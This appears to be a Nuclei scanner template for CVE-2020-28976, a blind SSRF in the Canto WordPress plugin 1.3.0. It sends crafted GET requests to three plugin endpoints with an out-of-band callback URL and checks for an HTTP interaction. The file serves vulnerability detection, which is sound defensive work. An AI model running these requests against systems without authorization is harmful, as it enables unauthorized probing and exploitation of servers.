32 lines
1.2 KiB
YAML
32 lines
1.2 KiB
YAML
id: CVE-2020-28976
|
|
|
|
info:
|
|
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
|
|
author: LogicalHunter
|
|
severity: medium
|
|
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/49189
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
|
|
- https://www.canto.com/integrations/wordpress/
|
|
- https://github.com/CantoDAM/Canto-Wordpress-Plugin
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2020-28976
|
|
cwe-id: CWE-918
|
|
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
|
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
|
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http" |